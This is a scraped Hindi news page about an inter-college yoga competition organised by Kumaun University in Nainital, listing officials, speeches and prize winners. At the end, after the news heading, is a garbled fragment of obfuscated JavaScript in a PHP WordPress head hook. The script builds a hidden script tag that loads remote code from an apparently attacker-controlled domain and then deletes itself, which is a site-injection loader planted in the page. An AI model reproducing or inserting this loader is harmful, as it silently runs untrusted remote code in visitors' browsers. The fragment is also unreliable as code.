Saturday, July 27, 2024
spot_img

कुविवि के योग विभाग द्वारा किया गया अंतर महाविद्यालय योग प्रतियोगिता का आयोजन

नैनीताल। कुमाऊँ विश्वविद्यालय के योग विभाग द्वारा आठवें अंतराष्ट्रीय योग दिवस के पूर्व दिवस में योग फ़ॉर हुमिनिटी थीम के अंतर्गत योगासन प्रतियोगिता का आयोजन यूजीसी एच आर डी सी केंद्र में किया गया जिसमें IMT काशीपुर के बालक एवम बालिकाओ , खटीमा की बालिका वर्ग, डी एस बी के बालक एवम बालिकाओ,योगनीलियम अल्मोड़ा के बालक एवम बालिका वर्ग की टीमों ने प्रतिभाग किया
व्यक्तिगत चैंपियनशिप में 11 प्रतिभागियों ने प्रतिभाग किया।
प्रतियोगिता का उद्घाटन कुलपति प्रोफ० एन के जोशी ने दीप प्रज्वलन कर एवं रिबन काटकर किया । कुलपति का स्वागत तिलक लगाकर , पुष्प गुच्छ भेंट कर, श्रीमद्भागवत गीता भेंट की।
इस अवसर पर कुलपति ने कहा कि योग सार्वभौमिक चेतना के साथ व्यक्तिगत चेतना का एक होना है, योग शरीर मन औऱ भावनाओ का एक होना है
यह भौतिक, मानसिक, भावनात्क,आत्मिक,आध्यात्मिक चेतना का मार्ग है , यह जीवन जीने का विज्ञान है
निदेशक डी एस बी प्रोफ एल एम जोशी, प्रोफ एल एस लोधियाल, नीता बोरा शर्मा ,डॉ नागेंद्र शर्मा, श्री दुर्गेश डिमरी का स्वागत तिलक लगाकर , पुष्प गुच्छ भेंट कर, श्रीमद्भागवत गीता भेंट की। कार्यक्रम का संचालन प्रोफ० ललित तिवारी ने किया विभागाध्यक्ष डॉ सीमा चौहान ने सभी का स्वागत कियोग संयोजक प्रोफेसर संजय गिलडियाल ने सबका धन्यवाद किया । कुलपति एवं युवा अधिकारी डोलवी तिवटिया ने विजेताओं को पुरुस्कार वितरित किए जिसमे टीम प्रतियोगिता में प्रथम स्थान- बालक वर्ग योग निल्यान अल्मोड़ा तथा महिला वर्ग में डी एस बी परिसर
द्वितीय स्थान – बालक वर्ग में एस सी जी आई काशीपुर तथा बालिका वर्ग में राजकीय स्नातकोत्तर महाविद्यालय खटीमा को मिला
व्यक्तिगत चैंपियनशिप में प्रथम नलिता अल्मोड़ा एवं यशिका नंदा नैनीताल
द्वितीय- हिमांशु अल्मोड़ा एवं धीरज रहे
यशिका एवम सुहार्दिका ने उत्कृष्ट प्रदर्शन कर सभी का दिल जीत लिया दोनों को 2100– 2100 की धनराशि नगद पुरुस्कार रूप में प्राप्त की।
योग प्रतियोगिता का संचालन सुनील विश्वकर्मा ने किया , कार्यक्रम में डॉ दीपाक्षी जोशी , नीतू गुप्ता,दीपा आर्या, भुवनेश जोशी,प्रियंका द्विवेदी, कृष्णा बिष्ट हिमांशु परगाई, लक्की, आदि उपस्थित रहे।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>